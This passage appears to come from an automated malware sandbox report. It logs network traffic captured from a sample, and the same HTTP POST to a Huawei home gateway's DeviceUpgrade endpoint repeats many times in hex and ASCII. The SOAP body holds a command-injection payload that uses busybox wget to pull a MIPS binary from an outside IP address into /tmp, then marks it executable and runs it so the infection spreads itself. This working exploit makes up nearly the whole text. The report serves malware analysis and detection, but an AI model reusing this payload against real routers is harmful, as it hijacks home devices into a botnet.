70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r 